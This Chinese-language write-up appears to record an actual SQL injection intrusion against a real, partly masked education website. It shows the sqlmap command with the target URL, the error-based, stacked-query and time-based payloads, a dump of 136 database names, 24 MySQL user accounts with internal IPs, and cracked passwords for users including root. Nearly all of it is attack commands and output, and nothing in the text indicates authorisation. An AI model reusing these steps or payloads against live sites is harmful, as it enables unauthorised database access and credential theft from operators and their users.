1.查找注入点:
D:\Python27\sqlmap>sqlmap.py -u http://xxcg.*****.com/learninglevel/SubjectDet
ail?id=35 –dbs
2.获取数据库
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
Payload: id=35 AND (SELECT 2685 FROM(SELECT COUNT(*),CONCAT(0x7178626b71,(SE
LECT (CASE WHEN (2685=2685) THEN 1 ELSE 0 END)),0x71787a6271,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: id=35; SELECT SLEEP(5)–
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=35 AND SLEEP(5)
—
[15:36:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: MySQL 5.0
[15:36:55] [INFO] fetching database names
[15:36:55] [INFO] the SQL query used returns 136 entries
available databases [136]:
[*] beehive_listenread
[*] beehive_pointmall
[*] beehive_synchronwork
[*] beehive_voicespeech
[*] beehivedb
[*] bookcase
[*] ciwong_colorful
[*] ciwong_newsmanagement
[*] ciwong_qr
[*] cloudreader
[*] cmsdata
[*] cw_6v68_settlement
[*] cw_admin_elearning
[*] cw_admin_elearning_bak
[*] cw_app_store
[*] cw_audio_video_db
[*] cw_basedapplications
[*] cw_chinadream
[*] cw_cooperator
[*] cw_dw
[*] cw_edu
[*] cw_elearning
[*] cw_elearning_bak
[*] cw_englishshow
[*] cw_eshop_cart
[*] cw_eshop_common
[*] cw_eshop_news
[*] cw_eshop_order
[*] cw_eshop_product
[*] cw_eshop_user
[*] cw_gwy
[*] cw_hd
[*] cw_homepage
[*] cw_jibei
[*] cw_jibei_school
[*] cw_learnmonth
[*] cw_microvideo
[*] cw_netschool
[*] cw_packager_arithmetic
[*] cw_packager_arithmetic_en
[*] cw_packager_ebook
[*] cw_packager_experiment
[*] cw_packager_experiment_v2
[*] cw_packager_kousuan
[*] cw_packager_learning_level
[*] cw_packager_listenning_ch
[*] cw_packager_listenning_ch_v2
[*] cw_packager_listenning_en
[*] cw_packager_listenning_en_v2
[*] cw_packager_playwords
[*] cw_packager_reading_ch
[*] cw_packager_reading_en
[*] cw_packager_speaking_en
[*] cw_pay
[*] cw_press
[*] cw_press_new
[*] cw_recommend
[*] cw_resx_center
[*] cw_settlement
[*] cw_trainingdb
[*] cw_workcategory
[*] cw_workcategory_arithmetic
[*] cw_workcategory_arithmetic_en
[*] cw_workcategory_common
[*] cw_workcategory_ebook
[*] cw_workcategory_experience
[*] cw_workcategory_experiment
[*] cw_workcategory_experiment_v2
[*] cw_workcategory_learning_level
[*] cw_workcategory_listenning_ch
[*] cw_workcategory_listenning_ch_v2
[*] cw_workcategory_listenning_en
[*] cw_workcategory_listenning_en_v2
[*] cw_workcategory_more
[*] cw_workcategory_playwords
[*] cw_workcategory_reading_ch
[*] cw_workcategory_reading_en
[*] cw_workcategory_settings
[*] cw_workcategory_speaking_en
[*] cw_workshop
[*] cw_workshop2
[*] cw_yishang
[*] cw_yishang1
[*] cw_yishang_settle
[*] cw_ziyuan
[*] cwapi
[*] cwfav
[*] db_ciliao
[*] db_filestatus
[*] db_kousuan100
[*] db_statistics
[*] db_txb
[*] db_txb_paipai
[*] efficientclassroom
[*] enterprisestudy
[*] game
[*] gxktv3
[*] gxktv3_resource
[*] information
[*] information_schema
[*] microrecord
[*] mysql
[*] notebook_good
[*] notebook_mistake
[*] notebook_senten
[*] notebook_word
[*] performance_schema
[*] qc_ciwong
[*] quesdata
[*] research
[*] research_ky
[*] roompermissionjingsai
[*] schoolzone
[*] searcher
[*] synchpreparation
[*] szdsy2013
[*] t_db_areaconf
[*] t_db_jibei
[*] t_db_listening
[*] t_db_markham
[*] t_db_reportlog
[*] t_db_roomtask
[*] t_db_tinyurl
[*] test
[*] videouser
[*] wiki
[*] wikicommunity
[*] wikipoint
[*] wikiques
[*] wordstockchinese
[*] wordstockenglish
[*] wordstockenglishchangebuilding
[*] wordstockenglishchangeclassifying
[*] wordstockenglishchangescene
[*] wordstocktempresources
[*] work_listen
3.获取数据库中的用户
database management system users [24]:
[*] 'backup'@'192.168.1.101'
[*] 'backup'@'192.168.1.237'
[*] 'bkpuser'@'127.0.0.1'
[*] 'bruce'@'%'
[*] 'cacti'@'192.168.1.241'
[*] 'china_read'@'%'
[*] '*****'@'%'
[*] '***_it'@'%'
[*] 'leoxqing'@'192.168.1.241'
[*] 'repl'@'192.168.1.%'
[*] 'repl_ck'@'192.168.1.%'
[*] 'root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'192.168.1.100'
[*] 'root'@'192.168.1.233'
[*] 'root'@'192.168.1.234'
[*] 'root'@'192.168.1.241'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'videouser'@'%'
[*] 'webadmin_pac'@'%'
[*] 'wordchange'@'%'
[*] 'zhiligame'@'%'
[*] 'ziyuan'@'%'
最后密码也爆出来:
[15:17:27] [INFO] cracked password '***' for user 'videouser'
[15:17:27] [INFO] cracked password '***' for user 'backup'
[15:17:38] [INFO] using suffix '1'
[15:17:54] [INFO] using suffix '***'
[15:18:03] [INFO] cracked password 'object***' for user 'root'
[15:18:06] [INFO] cracked password 'zhiligame***' for user 'bkpuser'
